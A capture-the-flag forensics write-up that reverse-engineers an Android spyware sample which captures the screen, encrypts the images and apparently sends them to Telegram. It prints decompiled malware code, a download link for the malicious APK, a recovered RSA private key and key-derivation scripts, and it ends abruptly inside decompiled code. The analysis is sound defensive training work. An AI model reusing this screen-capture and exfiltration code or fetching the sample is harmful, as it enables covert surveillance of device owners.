ITSEC CTF 2025 Writeup
This is a write-up of the challenges in Forensic.
HMICast
Difficulty: Hard
Several important data has been acquired from an employee’s device as an evidence. Dig into the evidence to expose the stealthy actions that went unnoticed.
Notes: This challenge contains real malicious process. Please execute on a safe and controlled environment. We are not responsible for any damages or losses resulting from the use or misuse of this challenge.
Author: BlackBear
We have the artifact for android’s device. There are also questions to answer in order to get the flag. The first common step to analyze an android artifact is using ALEAPP (https://github.com/abrignoni/ALEAPP), the android logs events and protobuf parser. I will explain the steps along with answering the questions that have been given.
1. Is the phone rooted?
In the given dump, we can see data/app/~~UXpNnlj9PjkB4iDEfPdSKA==/io.github.vvb2060.magisk-GP-E6zBnQdlL8wAiMlXSkA==, the common tools used to achive root access, Magisk. So the answer is yes.
2. What is the malicious package name?
There is a lot apps in the device’s dump, but we can se the uncommon package named com.itsec.hmi. To confirm suspicions about the application, we can perform several analyses, one of which is uploading it to the VirusTotal, a free online service that analyzes suspicious files, URLs, IP addresses, and domains using a multitude of antivirus engines and URL/domain blocklisting services.
So, its confirmed that the malicious package name is com.itsec.hmi.
3. What is the download link of the malicious package?
As I said before, we can use ALEAPP for the part of analysis. Open the ALEAPP result, we can go to Chrome downloads report and can found the download URL of the malicious package.
So the answer will be https://mega.nz/file/uddABYRD#c__klT8jtAiAhKLWNfuOuywoZiRfZfSXqxxryrVslj8.
4. What is the Android API that attacker use to capture victim’s screen
Next, we will start reversing the APK file. There are several tools that can be used for this. I’m using jadx. For the API to capture victim’s screen, we can search use cmd+shift+f and search source contains screen to narrow down to the answer.
There is Node named com.itsec.android.hmi.ScreenCaptureService.
Doing some research to find Android API to capture screen, I found https://developer.android.com/reference/android/media/projection/MediaProjectionManager. So we know that the Android API used for capture victim’s screen is android.media.projection.MediaProjectionManager.
5. What is the secretkey for image encryption process?
Use the same way, we can search secret or key word in the apk file.
package I0;
import W0.f;
import c1.l;
import com.itsec.android.hmi.CryptoService$stringfromnative;
import java.nio.charset.Charset;
import java.security.KeyFactory;
import java.security.PrivateKey;
import java.security.spec.PKCS8EncodedKeySpec;
import java.util.Base64;
import java.util.regex.Pattern;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
public abstract class a {
/* renamed from: a reason: collision with root package name */
public static final String f393a = CryptoService$stringfromnative.f1878a.getAES();
public static final String b = "lBaGqqmj";
/* renamed from: c reason: collision with root package name */
public static final String f394c = "Ud1PxFTYWLrqDduwBCfbRnbOGT2AasCFObFWPHInhsg9eACzYirAHSaqa9QCmcgrA7aQDVRuOxmYyy5U3h1jLQbCz97cNjEUCVl1Hk6G7L/uOGqCOsp1aabaQ7hBoIVL9E00OMRK7uVtQQgT4CzJZXI1fsLovFG1MBNdENGVE8M=";
/* renamed from: d reason: collision with root package name */
public static final byte[] f395d;
static {
byte[] bytes = "Cj7pYMR6FqYFKRYi".getBytes(c1.a.f1544a);
f.e(bytes, "this as java.lang.String).getBytes(charset)");
f395d = bytes;
}
public static byte[] a(byte[] bArr) {
byte[] bArr2;
CryptoService$stringfromnative cryptoService$stringfromnative = CryptoService$stringfromnative.f1878a;
String rSAKey = cryptoService$stringfromnative.getRSAKey();
String str = f394c;
f.f(str, "base64Encrypted");
f.f(rSAKey, "privateKeyPEM");
String w02 = l.w0(l.w0(rSAKey, "-----BEGIN RSA PRIVATE KEY-----", ""), "-----END RSA PRIVATE KEY-----", "");
Pattern compile = Pattern.compile("\\s");
f.e(compile, "compile(pattern)");
String replaceAll = compile.matcher(w02).replaceAll("");
f.e(replaceAll, "nativePattern.matcher(in…).replaceAll(replacement)");
PrivateKey generatePrivate = KeyFactory.getInstance("RSA").generatePrivate(new PKCS8EncodedKeySpec(Base64.getDecoder().decode(replaceAll)));
f.e(generatePrivate, "generatePrivate(...)");
Cipher instance = Cipher.getInstance(cryptoService$stringfromnative.getRSA());
instance.init(2, generatePrivate);
byte[] doFinal = instance.doFinal(Base64.getDecoder().decode(str));
f.c(doFinal);
Charset charset = c1.a.f1544a;
String str2 = new String(doFinal, charset) + b;
Cipher instance2 = Cipher.getInstance(f393a);
if (str2 != null) {
bArr2 = str2.getBytes(charset);
f.e(bArr2, "this as java.lang.String).getBytes(charset)");
} else {
bArr2 = null;
}
instance2.init(1, new SecretKeySpec(bArr2, "AES"), new IvParameterSpec(f395d));
byte[] doFinal2 = instance2.doFinal(bArr);
f.e(doFinal2, "doFinal(...)");
return doFinal2;
}
}Based on that, we know that to know the AES secret key is dynamically generated at runtime from an RSA-decrypted value and a hardcoded string. So we must found CryptoService$stringfromnative.getRSAKey() in the compiled library. There is two ways to get the fully secret key, static and dynamic analyze. I choose the static analyze at that time. There is 3 compiled library file (.so), go back to the dumps of data, we know that the program use arm library, so we know that the library file loaded is the arm one. For reversing the library file, there is several tools, Ghidra, IDA, Binary Ninja, etc. Im using Binary Ninja to analyze it. Then we can search function named as I said before.
int32_t Java_com_itsec_android_hmi_CryptoService_00024stringfromnative_getRSAKey(int32_t* arg1) int32_t r1 = *__stack_chk_guard
char var_201c
cb64(0x1e110, &var_201c, 0x2000)
int32_t result = (*(*arg1 + 0x29c))(arg1, &var_201c)
if (*__stack_chk_guard == r1)
return result
__stack_chk_fail()
noreturnI notice there is cb64(), likely custom Base64 decoding function. It take the data from 0x1e110 and return in &var_201c.
int32_t cb64(uint16_t const* arg1, char* arg2, int32_t arg3)
int32_t result = *__stack_chk_guard
char var_2030[0xc]
sub_454d8(&var_2030, 0x2000)
uint32_t r2 = zx.d(*arg1)
int32_t i
if (r2 == 0)
i = 0
else
int32_t lr_1 = 0
int32_t r10_1 = 0
label_21f72:
int32_t r6_1 = 0
while (true)
if (zx.d(*(&data_1e020 + (r6_1 << 1))) == r2)
var_2030[lr_1] = (r6_1 u>> 5).b & 1
var_2030[lr_1 | 1] = (r6_1 u>> 4).b & 1
void* r0_4 = &var_2030[lr_1]
lr_1 += 6
r2 = zx.d(arg1[r10_1 + 1])
*(r0_4 + 4) = (r6_1 u>> 1).b & 1
*(r0_4 + 5) = r6_1.b & 1
*(r0_4 + 3) = (r6_1 u>> 2).b & 1
*(r0_4 + 2) = (r6_1 u>> 3).b & 1
if (r2 == 0)
goto label_21fdc
bool cond:0_1 = r10_1 u< 0x7ff
r10_1 += 1
if (cond:0_1)
goto label_21f72
goto label_21fdc
r6_1 += 1
if (r6_1 == 0x40)
label_21fdc:
bool cond:2_1 = lr_1 s>= 8
i = 0
if (lr_1 s>= 8)
cond:2_1 = arg3 s>= 2
if (cond:2_1)
int32_t r3_1 = 7
do
void* r4_3 = &var_2030[i << 3]
uint32_t r0_7 = (zx.d(*(r4_3 + 2)) | zx.d(*(&var_2030[r3_1] - 7)) << 2
| zx.d(*(r4_3 + 1)) << 1) << 2 | zx.d(*(r4_3 + 3)) << 1
char r6_6 = var_2030[r3_1]
r3_1 += 8
arg2[i] = r6_6 | (((r0_7 | zx.d(*(r4_3 + 4))) << 2
| zx.d(*(r4_3 + 5)) << 1 | zx.d(*(r4_3 + 6))) << 1).b
i += 1
if (r3_1 u>= lr_1)
break
while (i s< arg3 - 1)
break
arg2[i] = 0
if (*__stack_chk_guard == result)
return result
__stack_chk_fail()
noreturn
The cb64 function’s do is to accept a Base64-encoded string and translate it back into the original raw byte data. It takes a look at each character one at a time and figures out what digit it represents through an obscure lookup table (data_1e020), and then steadily rebuilds the original data bit-for-bit. Once it has rebuilt as many bits as it takes in order to create one whole byte, it outputs one byte. It does so repeatedly until it has done so and is finished or has run out of space.
To compute that, we can collect the data_1e020 and the arg1, 0x1e110 .
#!/usr/bin/env python3
def recover_rsa_key():
data_1e020 = [
0x8c, 0x90, 0x93, 0xa0, 0xa6, 0xa9, 0xab, 0xad, 0xaf, 0xb0, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, 0xba,
0xc9, 0xcb, 0xcd, 0xce, 0xcf, 0xd0, 0xd1, 0xd2, 0xd3, 0xd4, 0xd6, 0xd7, 0xd8, 0xda, 0xdb, 0xdc,
0xdd, 0xde, 0xdf, 0xe0, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, 0xe8, 0xe9, 0xea, 0xec, 0xed, 0xee,
0x4a, 0x4e, 0x5c, 0x6b, 0x70, 0x78, 0x81, 0x87, 0xbc, 0xbd, 0xbf, 0xc0, 0xc1, 0xc3, 0xc5, 0xc8
]
char_to_index = {}
for i, char in enumerate(data_1e020):
char_to_index[char] = i
data_1e110 = [
0xb4, 0xcd, 0x70, 0xec, 0xb4, 0xcd, 0x78, 0x93, 0xcb, 0xcf, 0xda, 0xb0, 0xce, 0xdf, 0x90, 0xcd,
0xcf, 0x70, 0xa6, 0xdd, 0xcf, 0xa9, 0xb0, 0xb0, 0xd0, 0xe2, 0xa9, 0xcf, 0xcb, 0xcd, 0x90, 0xb4,
0xcb, 0xd0, 0xe2, 0xec, 0xb4, 0xcd, 0x70, 0xec, 0xb4, 0xc9, 0xe7, 0xb6, 0xcd, 0xcf, 0xe3, 0xa0,
0xd0, 0x87, 0xda, 0xb0, 0xc9, 0xe2, 0xa9, 0x90, 0xcd, 0x70, 0xb0, 0xe5, 0xcf, 0xcf, 0xb6, 0x5c,
0xb5, 0x81, 0xbc, 0x4a, 0xd7, 0xcf, 0xd8, 0x6b, 0xce, 0x81, 0xe3, 0xe0, 0xdb, 0xa9, 0x8c, 0xe9,
0xd0, 0x70, 0xe7, 0xee, 0xd3, 0xe2, 0xec, 0x81, 0xd4, 0xa0, 0xd0, 0xcd, 0xcf, 0xe0, 0xaf, 0xee,
0xd4, 0x87, 0xe3, 0xe5, 0xcf, 0xa9, 0xd0, 0xe2, 0xd1, 0xe4, 0xb0, 0x4e, 0xd1, 0xcf, 0xd4, 0xc9,
0xd1, 0xcf, 0xb0, 0x81, 0xb5, 0xe4, 0xde, 0x78, 0xd6, 0xab, 0xe7, 0xc9, 0xd8, 0xd2, 0xcb, 0xe3,
0x93, 0xe0, 0xd0, 0x90, 0xd8, 0x78, 0xcb, 0xcd, 0xcd, 0x70, 0xc3, 0xee, 0xce, 0x87, 0xe7, 0xd4,
0xcd, 0xa6, 0xe7, 0xec, 0xcb, 0xcf, 0xe7, 0xcf, 0xd7, 0x81, 0x78, 0xbc, 0xb4, 0x78, 0xa9, 0xd4,
0xd6, 0xd1, 0xb6, 0xb7, 0xd4, 0x78, 0xd0, 0xb6, 0xce, 0xa9, 0xe2, 0x70, 0xdb, 0xa6, 0x4e, 0xe0,
0xcb, 0xd0, 0xb0, 0xbd, 0xda, 0xd1, 0xaf, 0xee, 0xcf, 0xcf, 0xa6, 0x5c, 0xd3, 0xe4, 0xb6, 0xc9,
0xd7, 0xe0, 0xd0, 0xd0, 0xd8, 0xd1, 0xb0, 0x87, 0xcb, 0xe5, 0xde, 0xd2, 0xce, 0xd2, 0xe3, 0xee,
0xb6, 0xe5, 0xde, 0xe9, 0xd3, 0xcf, 0xdd, 0xb3, 0xd6, 0xd2, 0xe6, 0x6b, 0xd8, 0xd2, 0xb6, 0xaf,
0xd8, 0x6b, 0xe3, 0xb6, 0xcb, 0x87, 0xe3, 0x93, 0xc9, 0xcf, 0xe3, 0x4e, 0xb7, 0xa0, 0xb0, 0xe9,
0xd0, 0xad, 0xe7, 0xb5, 0xd7, 0xe4, 0xd8, 0xbc, 0xb5, 0xd1, 0x4e, 0xed, 0xd8, 0xe0, 0x90, 0xd6,
0xcd, 0x5c, 0xc3, 0xe8, 0xd7, 0xcf, 0x4e, 0xe6, 0xcf, 0xe5, 0xd0, 0x4a, 0xda, 0xd2, 0xd4, 0x70,
0xcb, 0xcf, 0xda, 0xd1, 0xb5, 0xd1, 0xbc, 0x78, 0xb7, 0xce, 0xb6, 0xcd, 0xdb, 0xe4, 0xb0, 0xbd,
0xcd, 0x81, 0xb0, 0xe0, 0xcf, 0xcf, 0xe3, 0xa6, 0xc9, 0xd0, 0xa9, 0x90, 0xc9, 0xdd, 0xe7, 0x90,
0xd7, 0x70, 0xda, 0x90, 0xcb, 0xa6, 0xec, 0xe2, 0xcd, 0xad, 0xd4, 0xd3, 0xda, 0xa0, 0xe2, 0x81,
0xda, 0xe2, 0x4e, 0xe5, 0xc9, 0xd0, 0x90, 0xcf, 0xcf, 0x5c, 0xea, 0x87, 0xd3, 0x78, 0xb0, 0xad,
0xdb, 0xe5, 0xd0, 0xb6, 0xd3, 0x81, 0xe3, 0xb0, 0xd3, 0x6b, 0xaf, 0xe9, 0xda, 0xe4, 0xde, 0xe6,
0xd0, 0xd0, 0xa9, 0xd4, 0xd4, 0x81, 0xde, 0xe7, 0xcd, 0xd0, 0xd4, 0xee, 0xcb, 0xd1, 0xd0, 0xb6,
0xce, 0xe4, 0xde, 0xd3, 0xd0, 0xce, 0xd0, 0xe5, 0xd6, 0x81, 0xd4, 0xb3, 0xd7, 0xd2, 0xb6, 0xab,
0xda, 0xcf, 0xda, 0x70, 0x93, 0xe2, 0xd8, 0x78, 0xb3, 0x81, 0x78, 0x78, 0xb5, 0xa6, 0xda, 0x70,
0xb4, 0x6b, 0xc9, 0x5c, 0xd8, 0xd0, 0xda, 0x81, 0xd0, 0xa6, 0xd3, 0x70, 0xb7, 0xa0, 0xd4, 0xec,
0xcf, 0x6b, 0xdd, 0x5c, 0xd7, 0xe5, 0xe6, 0x81, 0xd6, 0xa9, 0xd0, 0x5c, 0xd1, 0xab, 0xd4, 0xb3,
0xd3, 0xd1, 0xe6, 0xe9, 0xd6, 0xcf, 0xb6, 0x6b, 0xb5, 0x81, 0x4e, 0xdf, 0xd0, 0x87, 0xde, 0xe7,
0xcd, 0xa0, 0xb6, 0xed, 0xd1, 0xe0, 0xb6, 0x93, 0xce, 0xe0, 0xa9, 0x87, 0xb7, 0xa9, 0xb6, 0xd1,
0xcf, 0xd2, 0xda, 0x87, 0xb6, 0xe3, 0x8c, 0x4a, 0xd8, 0xd1, 0xcf, 0xb3, 0xdb, 0xa0, 0xaf, 0xee,
0xdb, 0xce, 0xd4, 0xd3, 0xc9, 0xe4, 0xda, 0xe0, 0xd4, 0x6b, 0xa9, 0xec, 0xcf, 0xe5, 0xb6, 0xbc,
0xd6, 0xab, 0xd4, 0xe4, 0xb5, 0xe2, 0xcb, 0xee, 0xd1, 0xe2, 0xc1, 0xbd, 0xd1, 0xa9, 0xa9, 0xce,
0xd8, 0xe5, 0xe6, 0x78, 0xd7, 0x81, 0xd0, 0xe2, 0xce, 0xab, 0xa6, 0x81, 0xd4, 0xa6, 0xc9, 0xe9,
0xce, 0xe5, 0xa9, 0x78, 0xcd, 0x87, 0xcf, 0x6b, 0xd4, 0x70, 0xd0, 0xa0, 0xcf, 0xd0, 0xa9, 0xa6,
0xb4, 0x81, 0xd0, 0xa9, 0xc9, 0x81, 0xcb, 0xe2, 0xcd, 0xe2, 0xbd, 0xb4, 0xd0, 0xd2, 0xe2, 0x4e,
0xcf, 0xc9, 0xe6, 0xbc, 0xd7, 0xe4, 0xd4, 0xdf, 0xdb, 0xe2, 0xea, 0x4e, 0xd0, 0x6b, 0xcb, 0xea,
0xd7, 0xce, 0xcb, 0xe7, 0xd6, 0x70, 0xec, 0x93, 0xcb, 0xd1, 0xa9, 0xcf, 0xd8, 0xad, 0xd4, 0xcb,
0xd1, 0xcf, 0xb5, 0x81, 0xb3, 0x81, 0xd3, 0xe9, 0xd4, 0xab, 0xde, 0xed, 0xb5, 0x87, 0x90, 0xb4,
0xd8, 0xa0, 0x90, 0xab, 0xda, 0xad, 0xe6, 0x4a, 0xd0, 0x81, 0xc3, 0xb7, 0xcf, 0xe0, 0xa9, 0xc9,
0xdb, 0xab, 0xb0, 0xcd, 0xb5, 0xd2, 0xde, 0xb7, 0xd7, 0xe3, 0xa9, 0xce, 0xd8, 0x5c, 0xec, 0xe7,
0xd8, 0xe4, 0xcf, 0x87, 0xd8, 0x81, 0xc9, 0xee, 0x93, 0xe3, 0xde, 0xb7, 0xc9, 0xe4, 0xc3, 0x4e,
0xd8, 0xa9, 0x90, 0xe6, 0xc9, 0xd1, 0xec, 0xa9, 0xc9, 0xd2, 0xb0, 0xa6, 0xd7, 0xe3, 0xa9, 0xd6,
0xcb, 0x6b, 0xda, 0xcf, 0xd0, 0xa0, 0xde, 0xe4, 0xd0, 0xa9, 0xa9, 0xcd, 0xd1, 0xab, 0xc3, 0xe3,
0xd8, 0xcf, 0xd4, 0xe8, 0xd0, 0x6b, 0xb6, 0xa6, 0xcd, 0x70, 0xc3, 0xba, 0xcb, 0xd0, 0xd0, 0xcb,
0xda, 0x87, 0xde, 0xed, 0xd8, 0xa0, 0xa6, 0x87, 0xd7, 0xad, 0xe2, 0x78, 0xda, 0xe2, 0xb6, 0xe5,
0xb5, 0xd2, 0xe3, 0x4e, 0xdb, 0xab, 0xc3, 0xb6, 0xd0, 0xd1, 0xd0, 0xde, 0xcd, 0xd1, 0x4a, 0xb3,
0xd6, 0xd1, 0xb5, 0x4a, 0xdb, 0xd0, 0xcf, 0xbd, 0xcf, 0x70, 0xcf, 0x78, 0xc9, 0xe5, 0xd4, 0xd6,
0xda, 0x81, 0xcb, 0x93, 0xd1, 0xcf, 0x78, 0xd3, 0xd0, 0xe2, 0x4e, 0xd2, 0xb6, 0xd1, 0x78, 0xcd,
0xb3, 0x70, 0xec, 0xe2, 0xd7, 0xa0, 0xcb, 0xee, 0xb4, 0x6b, 0xd0, 0xe9, 0xcf, 0xcf, 0xe7, 0x90,
0xc9, 0xd0, 0xd0, 0xbc, 0xce, 0x70, 0xdd, 0x87, 0xb6, 0xe5, 0xd8, 0x78, 0xce, 0x81, 0xb0, 0xb3,
0xcf, 0x87, 0xe3, 0xe9, 0xc9, 0xd0, 0x90, 0xba, 0xd6, 0xd2, 0xb6, 0xd1, 0xce, 0xce, 0xb0, 0x81,
0xd7, 0x78, 0xa9, 0xd1, 0xd8, 0xc9, 0xe6, 0x4a, 0xdb, 0xab, 0xb6, 0xcb, 0xb5, 0x70, 0xde, 0xb6,
0xda, 0xd1, 0xb0, 0xde, 0xce, 0xe4, 0xd4, 0xba, 0xd0, 0x81, 0xb0, 0xad, 0xce, 0x78, 0xa9, 0xa6,
0xd7, 0x70, 0x78, 0xb7, 0xcb, 0xa9, 0xa6, 0x87, 0xcd, 0xe4, 0xe7, 0x70, 0xcd, 0xcd, 0xec, 0xcd,
0xce, 0x70, 0xe6, 0xee, 0xcf, 0x78, 0xc9, 0x6b, 0xd7, 0xe0, 0x90, 0xd2, 0xda, 0x81, 0xd3, 0x70,
0xb4, 0x81, 0xa6, 0x70, 0xcf, 0x78, 0xb0, 0xab, 0xce, 0x5c, 0xec, 0xd2, 0xdb, 0xce, 0xcb, 0xab,
0xd3, 0xd0, 0xe3, 0xcb, 0xcd, 0xe2, 0xa9, 0xe4, 0xcf, 0xe0, 0xe2, 0xee, 0x93, 0xe4, 0xbd, 0x90,
0xd4, 0xce, 0xde, 0xb6, 0xb7, 0xa6, 0xd0, 0xb6, 0xd1, 0xe2, 0x78, 0xc9, 0xc9, 0x6b, 0xc9, 0x78,
0xdb, 0xe5, 0xd0, 0x5c, 0xb5, 0xd1, 0xb6, 0xbc, 0xcf, 0xce, 0xde, 0xba, 0xd3, 0xd0, 0xd0, 0xe2,
0xb4, 0x81, 0xc3, 0xce, 0xd7, 0xe5, 0xd0, 0xbd, 0xd1, 0xa9, 0xe3, 0x70, 0xd8, 0xce, 0xe3, 0xb5,
0xb6, 0x78, 0xd4, 0xc9, 0xb5, 0xe3, 0xda, 0x4a, 0xb7, 0xa9, 0xde, 0xe6, 0xda, 0x6b, 0xd0, 0xbf,
0xb5, 0xe3, 0xaf, 0x81, 0xb6, 0x5c, 0xec, 0x93, 0xd0, 0xcf, 0xec, 0x87, 0xb4, 0x70, 0xbd, 0x87,
0xd0, 0xab, 0xe6, 0xb3, 0xd7, 0xe4, 0xda, 0xb6, 0xcb, 0x78, 0xde, 0xde, 0xd0, 0xd1, 0xe7, 0xed,
0xce, 0xe2, 0xa9, 0xd6, 0xcf, 0xcf, 0xd4, 0xad, 0xdb, 0xe3, 0xd0, 0xcb, 0xcd, 0xe2, 0xa9, 0xb4,
0xb5, 0xcf, 0x4e, 0xa0, 0xd6, 0x78, 0xde, 0xcd, 0xb7, 0xa6, 0xda, 0x90, 0xd1, 0xe2, 0xde, 0xa0,
0xd6, 0xa9, 0xd4, 0xb3, 0xd8, 0x78, 0xde, 0xba, 0xd0, 0xe4, 0xd4, 0x6b, 0xd1, 0xd0, 0xd0, 0x93,
0xdb, 0xcd, 0xec, 0xd3, 0xcd, 0x81, 0xec, 0xcf, 0xda, 0xd2, 0xdd, 0x70, 0xda, 0x87, 0xe7, 0xc9,
0xb6, 0xa9, 0xd8, 0xee, 0xd4, 0xe2, 0xcb, 0xe4, 0xb7, 0xc9, 0xe7, 0xd4, 0xd8, 0x70, 0xbd, 0xa0,
0xcb, 0xa0, 0x90, 0x93, 0xd8, 0x70, 0xe3, 0xad, 0xb5, 0xce, 0xd4, 0x78, 0xd8, 0xce, 0xe3, 0xd3,
0xcd, 0x81, 0xd0, 0xe7, 0xcb, 0xe3, 0xd4, 0xa6, 0xcf, 0xe4, 0xb5, 0xbc, 0xd4, 0xd2, 0x90, 0xe9,
0xc9, 0x6b, 0xaf, 0xee, 0xd6, 0xce, 0xd0, 0xab, 0xc9, 0xcf, 0x78, 0xa9, 0xd7, 0x87, 0xde, 0xc9,
0xd8, 0xd0, 0xa6, 0xc3, 0xba, 0xc9, 0xe6, 0xec, 0xb4, 0xcd, 0x70, 0xec, 0xb4, 0xcf, 0xd0, 0xb7,
0xcb, 0x93, 0x90, 0xcd, 0xcf, 0x70, 0xa6, 0xdd, 0xcf, 0xa9, 0xb0, 0xb0, 0xd0, 0xe2, 0xa9, 0xcf,
0xcb, 0xcd, 0x90, 0xb4, 0xcb, 0xd0, 0xe2, 0xec, 0xb4, 0xcd, 0x70, 0xec, 0xb4, 0xc9
]
decoded_bits = []
for byte_val in data_1e110:
if byte_val in char_to_index:
index = char_to_index[byte_val]
for bit_pos in range(5, -1, -1):
bit = (index >> bit_pos) & 1
decoded_bits.append(bit)
decoded_bytes = []
for i in range(0, len(decoded_bits) - 7, 8):
byte_val = 0
for j in range(8):
if i + j < len(decoded_bits):
byte_val |= decoded_bits[i + j] << (7 - j)
decoded_bytes.append(byte_val)
try:
decoded_text = bytes(decoded_bytes).decode('ascii', errors='ignore')
if "-----BEGIN" in decoded_text:
lines = decoded_text.split('\n')
for line in lines:
if line.strip():
print(line)
else:
hex_output = ' '.join(f'{b:02x}' for b in decoded_bytes[:100])
print(hex_output)
except Exception as e:
hex_output = ' '.join(f'{b:02x}' for b in decoded_bytes[:100])
print(hex_output)
return decoded_bytes
recovered_key = recover_rsa_key()-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQCr3n0mG3OicxP+WJobKvd5RR2/gygPUdZbqYFPYBv2huhjPqte
5AsTRKOoOzYHJmEJTomx/QYicNgUMLY4xLcERyub/QA2bcPn5UqbwFxWMyo6xkaH
iz3qsHs9MGyBAIq82kTzLng81lnr0ZK/jmLhRupuvtEGV1n593RzbyKbcQIDAQAB
AoGADKdHvXt96vLgAPTS+7cRGzuMciIc2+vhhUQYghiIVoEeMNhXU5gkfJmsFuGt
G5+mu0Gt/42qWvTF486mS82nz6hUrXfJaj+iCs3lbWxiH3nZ3BN1w8SVQww6P0qe
x2/y6XBgcg1mRsxhff2DoZO9XQSrz5oedLa6dD+NquKu3gECQQD/eECddJNKUy1Q
8nfbzK1W4lm4ikKBEaTpvQYC6+f+dhn3pKp0Ftz0WoNR1PxbR1xNnQSs+ire7sd/
XNBoqpPhAkEArDnQZG7TT8fTQRXoeqFjW3DKOOEUQwxnp17ly5vCg1yqxoMUeaIl
ic0yU9SE5BvZwdBYMXVLW5mR+Kdl4o/5kQJAAUxOH76w5ObJSykAPOisVM2voQVq
0xcQ3HMubaNfOWbGOQDoMNDQ7JjtI+ROJ/ST3n0Wwf4/a4SRFO+Wy4FaYQJAfR9/
nAe8M8EMZMPC45zur1cxQ8OaUd/oSnuyXYtq9L7VP2Wp8Xhw5z2R67+BUKw/NwTj
ngMGXaUjnNAZQFGzUQJAK1LCkXR8GAZHChVJsXOVfsYUBy+XKkTux4wzP4W/fDf9
YsNCD0BsIG16uq9XKeiFVDRc8epkC2/i5FAMEoxPqQ==
-----END RSA PRIVATE KEY-----Then, we can compute the secret key because we know the flow is the app stores an AES encryption key obfuscated. It stores an RSA-encrypted value f394c as a Base64 string. When it wants the AES key, it first loads an RSA private key from native code. Then it removes the PEM headers, Base64-decodes the private key, and uses it to create an RSA cipher in decrypt mode. That cipher it then uses to decrypt f394c and generate an AES key as a string. That string it then combines with a fixed constant lBaGqqmj and gets the complete AES key. Then it converts this string into bytes and that byte array becomes the AES secret key for encrypting/decrypting images, with the IV being the fixed 16-byte string Cj7pYMR6FqYFKRYi.
from base64 import b64decode
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5
private_key_pem = b"""-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQCr3n0mG3OicxP+WJobKvd5RR2/gygPUdZbqYFPYBv2huhjPqte
5AsTRKOoOzYHJmEJTomx/QYicNgUMLY4xLcERyub/QA2bcPn5UqbwFxWMyo6xkaH
iz3qsHs9MGyBAIq82kTzLng81lnr0ZK/jmLhRupuvtEGV1n593RzbyKbcQIDAQAB
AoGADKdHvXt96vLgAPTS+7cRGzuMciIc2+vhhUQYghiIVoEeMNhXU5gkfJmsFuGt
G5+mu0Gt/42qWvTF486mS82nz6hUrXfJaj+iCs3lbWxiH3nZ3BN1w8SVQww6P0qe
x2/y6XBgcg1mRsxhff2DoZO9XQSrz5oedLa6dD+NquKu3gECQQD/eECddJNKUy1Q
8nfbzK1W4lm4ikKBEaTpvQYC6+f+dhn3pKp0Ftz0WoNR1PxbR1xNnQSs+ire7sd/
XNBoqpPhAkEArDnQZG7TT8fTQRXoeqFjW3DKOOEUQwxnp17ly5vCg1yqxoMUeaIl
ic0yU9SE5BvZwdBYMXVLW5mR+Kdl4o/5kQJAAUxOH76w5ObJSykAPOisVM2voQVq
0xcQ3HMubaNfOWbGOQDoMNDQ7JjtI+ROJ/ST3n0Wwf4/a4SRFO+Wy4FaYQJAfR9/
nAe8M8EMZMPC45zur1cxQ8OaUd/oSnuyXYtq9L7VP2Wp8Xhw5z2R67+BUKw/NwTj
ngMGXaUjnNAZQFGzUQJAK1LCkXR8GAZHChVJsXOVfsYUBy+XKkTux4wzP4W/fDf9
YsNCD0BsIG16uq9XKeiFVDRc8epkC2/i5FAMEoxPqQ==
-----END RSA PRIVATE KEY-----"""
encrypted_aes_key_b64 = "Ud1PxFTYWLrqDduwBCfbRnbOGT2AasCFObFWPHInhsg9eACzYirAHSaqa9QCmcgrA7aQDVRuOxmYyy5U3h1jLQbCz97cNjEUCVl1Hk6G7L/uOGqCOsp1aabaQ7hBoIVL9E00OMRK7uVtQQgT4CzJZXI1fsLovFG1MBNdENGVE8M="
rsa_key = RSA.import_key(private_key_pem)
cipher_rsa = PKCS1_v1_5.new(rsa_key)
decrypted_part = cipher_rsa.decrypt(b64decode(encrypted_aes_key_b64), None).decode()
full_aes_key_str = decrypted_part + "lBaGqqmj"
aes_key_bytes = full_aes_key_str.encode()
print("AES key string:", full_aes_key_str)
print("AES key (hex):", aes_key_bytes.hex())The secret key turned out to be dPGgF7tQlBaGqqmj.
6. Where the encrypted image sent to?
At first, I confused because in the jadx, there is no clue for the source code for the image send to. So Im use another tools for decompiling the apk use http://www.javadecompilers.com/apk. In the same path as the source code for compute the secret key, source/I0, we found c.java that communicate with telegram.
package I0;
import C0.e;
import D0.h;
import I.Q;
import W0.f;
import a0.C0040d;
import a0.C0041e;
import a0.C0044h;
import a0.C0045i;
import a0.C0046j;
import a0.C0049m;
import a0.H;
import a0.a0;
import android.animation.ValueAnimator;
import android.graphics.Bitmap;
import android.media.Image;
import android.media.ImageReader;
import android.os.SystemClock;
import android.text.TextUtils;
import android.util.Log;
import android.view.MotionEvent;
import android.view.View;
import android.view.ViewPropertyAnimator;
import android.view.animation.AnimationUtils;
import androidx.appcompat.widget.ActionMenuView;
import androidx.appcompat.widget.Toolbar;
import androidx.emoji2.text.s;
import androidx.fragment.app.C0065d;
import androidx.fragment.app.C0073l;
import androidx.fragment.app.D;
import androidx.recyclerview.widget.RecyclerView;
import androidx.recyclerview.widget.StaggeredGridLayoutManager;
import com.google.android.material.bottomsheet.BottomSheetBehavior;
import com.itsec.android.hmi.ScreenCaptureService;
import f1.m;
import f1.o;
import f1.q;
import f1.r;
import f1.t;
import f1.u;
import f1.v;
import f1.w;
import g1.b;
import i1.a;
import j.C0236j;
import j.C0261v0;
import j1.g;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.nio.ByteBuffer;
import java.util.ArrayDeque;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.UUID;
import java.util.WeakHashMap;
import java.util.logging.Level;
import java.util.regex.Pattern;
import n1.d;
import n1.l;
import n1.n;
import s1.i;
import s1.j;
public final class c implements Runnable {
/* renamed from: a reason: collision with root package name */
public final /* synthetic */ int f400a;
public final /* synthetic */ Object b;
public /* synthetic */ c(int i2, Object obj) {
this.f400a = i2;
this.b = obj;
}
/* JADX INFO: finally extract failed */
public final void run() {
String str;
o oVar;
g gVar;
Throwable th;
int i2;
boolean z2;
a c2;
long j2;
C0236j jVar;
g gVar2 = null;
switch (this.f400a) {
case 0:
ScreenCaptureService screenCaptureService = (ScreenCaptureService) this.b;
ImageReader imageReader = screenCaptureService.f1881c;
Image acquireLatestImage = imageReader != null ? imageReader.acquireLatestImage() : null;
if (acquireLatestImage != null) {
